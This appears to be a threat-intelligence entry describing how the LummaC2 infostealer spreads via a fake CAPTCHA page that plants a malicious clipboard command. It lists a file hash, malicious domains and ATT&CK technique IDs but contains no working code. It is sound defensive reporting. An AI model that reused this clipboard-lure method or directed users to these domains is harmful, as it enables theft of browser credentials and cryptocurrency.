Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page
Jan. 13, 2025, 4:45 p.m.
Tags
External References
Description
A new distribution method for the LummaC2 infostealer malware has been identified, using a fake CAPTCHA verification page. The process begins with a deceptive authentication screen that copies a malicious command to the clipboard when users click 'I'm not a robot'. This command executes an obfuscated HTA file, which in turn runs an encrypted PowerShell script. The final payload is LummaC2, capable of stealing browser data and cryptocurrency information. The malware also employs a ClipBanker module to monitor and manipulate clipboard content, specifically targeting cryptocurrency wallet addresses. This distribution method is primarily found on crack program download pages and in phishing emails, emphasizing the need for caution when interacting with unfamiliar sources.
Date
Published: Jan. 13, 2025, 4:41 p.m.
Created: Jan. 13, 2025, 4:41 p.m.
Modified: Jan. 13, 2025, 4:45 p.m.
Indicators
d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
cc.klipjaqemiu.shop
noisercluch.click
klipjaqemiu.shop
Attack Patterns
LummaC2
T1102.002
T1573.001
T1555.003
T1204.001
T1059.001
T1566.002
T1056.001
T1555
T1566.001
T1027